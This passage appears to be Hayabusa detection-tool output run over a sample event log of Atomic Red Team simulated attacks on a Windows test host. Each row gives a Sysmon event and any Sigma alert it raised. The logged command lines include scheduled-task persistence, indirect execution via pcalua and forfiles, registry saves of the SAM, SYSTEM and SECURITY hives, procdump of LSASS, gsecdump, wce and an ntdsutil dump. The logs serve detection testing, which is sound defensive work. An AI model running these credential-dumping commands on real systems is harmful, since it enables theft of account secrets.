C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-DA6A-5D31-0000-001074C23E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-DA6A-5D31-0000-0010C5C43E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-DA6A-5D31-0000-00104BC83E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5332 | PGUID: 747F3D96-DA6B-5D31-0000-0010CCD03E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a -c | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-DA6B-5D31-0000-00102DD33E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3316 | PGUID: 747F3D96-DA6E-5D31-0000-0010D8F63E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a Java | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | LID: 0x50951 | PID: 1284 | PGUID: 747F3D96-DA6E-5D31-0000-001081F93E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-DA70-5D31-0000-001007293F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a C:\Windows\system32\javacpl.cpl | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-DA70-5D31-0000-00100E2C3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:53.882 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6168 | PGUID: 747F3D96-DA71-5D31-0000-00101A463F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:54.099 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1300 | PGUID: 747F3D96-DA72-5D31-0000-0010044F3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:54.129 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-DA72-5D31-0000-001056513F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,low,Evas,Indirect Command Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:54.165 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | LID: 0x50951 | PID: 3160 | PGUID: 747F3D96-DA72-5D31-0000-0010B1543F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:55.069 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1052 | PGUID: 747F3D96-DA73-5D31-0000-00106A8D3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:55.138 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe | Process: C:\Windows\System32\forfiles.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""forfiles /p c:\windows\system32 /m notepad.exe /c "" c:\folder\normal.dll:evil.exe | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-DA73-5D31-0000-0010918F3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:55.236 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1724 | PGUID: 747F3D96-DA73-5D31-0000-001061933F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49734 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3912 | PGUID: 747F3D96-D6F7-5D31-0000-00104ACE2500,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:58.359 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:09:40.973 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 4516 288 0000023C0CA1FA70 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 3496 | PGUID: 747F3D96-DD34-5D31-0000-0010FCC64800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:09:43.329 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x50951 | PID: 5632 | PGUID: 747F3D96-DD37-5D31-0000-00109D4C4900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x50951 | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:09:59.931 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\3ivx11ib\3ivx11ib.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:10:52.700 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /user | Process: C:\Windows\System32\whoami.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5792 | PGUID: 747F3D96-DD8B-5D31-0000-001094584A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,../hayabusa-rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:07.994 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49744 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 5840 | PGUID: 747F3D96-DD47-5D31-0000-001015874900,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:08.184 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 5840 | Src PGUID: 747F3D96-DD47-5D31-0000-001015874900 | Tgt PID: 612 | Tgt PGUID: 747F3D96-D4A4-5D31-0000-00104A560000,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:16.487 +09:00,MSEDGEWIN10,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,../hayabusa-rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:16.986 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""gsecdump -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3920 | PGUID: 747F3D96-DD94-5D31-0000-0010F4864A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.027 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5476 | PGUID: 747F3D96-DD95-5D31-0000-0010148A4A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.107 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""wce -o output.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5216 | PGUID: 747F3D96-DD95-5D31-0000-0010B38E4A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.149 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6264 | PGUID: 747F3D96-DD95-5D31-0000-0010D6914A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DD95-5D31-0000-001075964A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.224 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\sam sam | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\sam sam"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-DD95-5D31-0000-0010C7984A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:17.243 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4080 | PGUID: 747F3D96-DD99-5D31-0000-001069A34A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:21.090 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\system system | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\system system"" | LID: 0x50951 | PID: 1136 | PGUID: 747F3D96-DD99-5D31-0000-0010BBA54A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:21.105 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7164 | PGUID: 747F3D96-DD9B-5D31-0000-00106C1C4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:23.317 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: reg save HKLM\security security | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\security security"" | LID: 0x50951 | PID: 4464 | PGUID: 747F3D96-DD9B-5D31-0000-0010BE1E4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:23.336 +09:00,MSEDGEWIN10,1,high,CredAccess,Registry Dump of SAM Creds and Secrets,,../hayabusa-rules/sigma/process_creation/proc_creation_win_reg_dump_sam.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.549 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3016 | PGUID: 747F3D96-DD9E-5D31-0000-0010CB274B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""procdump.exe -accepteula -ma lsass.exe lsass_dump.dmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5488 | PGUID: 747F3D96-DD9E-5D31-0000-00106E2C4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas | CredAccess,Suspicious Use of Procdump on LSASS,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_procdump_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,critical,Evas,Renamed ProcDump,,../hayabusa-rules/sigma/process_creation/proc_creation_win_renamed_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Use of Procdump,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,low,ResDev,Usage of Sysinternals Tools,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,medium,Evas,Procdump Usage,,../hayabusa-rules/sigma/process_creation/proc_creation_win_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.642 +09:00,MSEDGEWIN10,1,high,CredAccess,LSASS Memory Dumping,,../hayabusa-rules/sigma/process_creation/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.686 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DD9E-5D31-0000-00109A2F4B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-20 00:11:26.852 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""ntdsutil “ac i ntds” “ifm” “create full C:\Atomic_Red_Team q q"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | 